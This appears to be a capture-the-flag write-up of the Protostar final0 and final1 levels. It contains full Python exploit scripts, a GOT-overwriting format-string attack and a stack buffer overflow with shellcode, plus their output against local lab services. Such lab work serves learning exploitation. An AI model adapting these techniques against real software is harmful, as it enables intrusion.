Exploit Exercises Protostar — final1

user@protostar:~$ cat final1.py
#!/usr/bin/python

import socket
import struct

# Obviously I'm doing this from the Protostar VM itself. Keep that in mind in
# case you would want to do that via network (offsets in writing will be
# different)
HOST = "127.0.0.1"
PORT = 2994

s = socket.socket()
s.connect((HOST, PORT))

print s.recv(1024) # First prompt from the server

username = "username "
# Address of GOT entry for puts() = 0x0804a194
username +="-\x94\xa1\x04\x08----\x95\xa1\x04\x08----\x96\xa1\x04\x08----\x97\xa1\x04\x08"
username += "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
username += "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
username += "\x70\x77\x6e\x65\x64\x21\x0a"
# Using \n is crucial in this example due to inner workings of fgets()
username += '\n'
print "[*] DEBUG: sizeof(username) == " + str(len(username))

# Our ret-addr is address of username array which is global variable (hence
# static address + it resides in different code segment). We also need to take
# into notice shellcode's offset (it's in the middle of username[]).
# ret-addr = 0x804a23d
login = "login "
login += "%p"*13+"%75p" + "%n" # 1st write, LSB of puts() ptr from GOT
login += "%101p" + "%n" # 2nd write, middle byte of puts() ptr from GOT
login += "%98p" + "%n" # 3rd write, middle byte of puts() ptr from GOT
login += "%260p" + "%n" # 4th write, MSB of puts() ptr from GOT
login += '\n'
print "[*] DEBUG: sizeof(login) == " + str(len(login))

payload = username + login
print "[+] Sending payload:\n" + "\"" + payload + "\"" + " (length = " + str(len(payload)) + ")"
s.send(payload)
print s.recv(1024)
print s.recv(1024)

s.close()
user@protostar:~$ chmod +x final1.py
user@protostar:~$ ./final1.py
[final1] $
[*] DEBUG: sizeof(username) == 78
[*] DEBUG: sizeof(login) == 59
[+] Sending payload:
"username -��----��----��----���1�1�1�1Ұ�Y�̀1�1۰̀�����pwned!

login %p%p%p%p%p%p%p%p%p%p%p%p%p%75p%n%101p%n%98p%n%260p%n
" (length = 137)
[final1] $
[final1] $ pwned!

It was easy but debugging was major PITA. (Done via dmesg and /tmp/core-files in gdb.)

Steps were as follows:

1. Establish communication channel (meaning, properly hit logit() function)
2. Initial crash
3. Start peeking at memory (writing via %n and inspecting faulty instructions via dmesg)
4. Craft an exploit

Exploit Exercises Protostar — final0

Classic stack-based buffer overflow via gets(). Nothing fancy here.

user@protostar:~$ cat final0.py
#!/usr/bin/python

import socket
import struct

HOST = "127.0.0.1"
PORT = 2995

s = socket.socket()
s.connect((HOST, PORT))

payload = ""
for i in range(532):
payload = payload + 'a'
payload = payload + "\xd0\xfc\xff\xbf" # ret-addr (we're returning to stack-based shellcode)
payload = payload + "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
payload = payload + "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
payload = payload + "\x70\x77\x6e\x65\x64\x21\x0a"

s.send(payload)
print s.recv(1024)

s.close()
user@protostar:~$ chmod +x final0.py
user@protostar:~$ ./final0.py
pwned!

RET was deducted from core files.